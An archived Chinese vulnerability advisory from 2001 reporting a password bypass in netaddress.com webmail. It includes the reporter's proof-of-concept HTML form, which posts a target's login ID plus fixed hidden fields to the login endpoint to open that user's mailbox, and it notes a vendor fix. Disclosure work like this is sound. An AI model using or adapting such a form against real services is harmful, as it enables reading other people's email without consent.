netaddress.com 读取任意用户邮件漏洞
发布日期:2001-08-03
更新日期:2001-08-03
受影响系统:
netaddress.com
描述:
netaddress.com提供的邮件服务中存在一个安全漏洞,可能允许攻击者无需口令就可打开
任意用户的邮箱。
当向/tpl/Door/Login提交登录表单时,它只需要三个参数:maidid, domainid(value=4),
domain(value=usa.net).因此用户可以创建一个包含这三个参数的HTML文件,将表单发送
给http://netaddress.com//tpl/door/login, 攻击者就可能查看任意用户的邮箱。
<*来源:syed mohamed (
syedblr@hotmail.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
syed mohamed (
syedblr@hotmail.com) 提供了如下测试代码:
<html>
<form name="loginform"
action="http://classic.netaddress.com//tpl/Door/LoginPost"
method="POST" target=_blank>
<input type="hidden" name="LoginState" value="2">
<input type="hidden" name="DomainID" value="4">
<input type="hidden" name="Domain" value="usa.net">
<b><font color="#FF0000" size="2" face="Arial">Netaddress Security hole -
Demo</font></b><font face="Arial" size="2"><br>
<br>
Developed By Syed Mohamed (<a
href="mailto:syedblr@hotmail.com">syedblr@hotmail.com</a>)<br>
<br>
Just Enter Login ID (enter example if netaddress id is
example@usa.net)</font>
<p>
<input type="text" size="16" name="UserID"
value="">
<input type="submit" value="Login">
</form>
</p>
</html>
建议:
厂商补丁:
netaddress.com已经解决了这个问题。
http://www.netaddress.com
浏览次数:3869
严重程度:0(网友投票)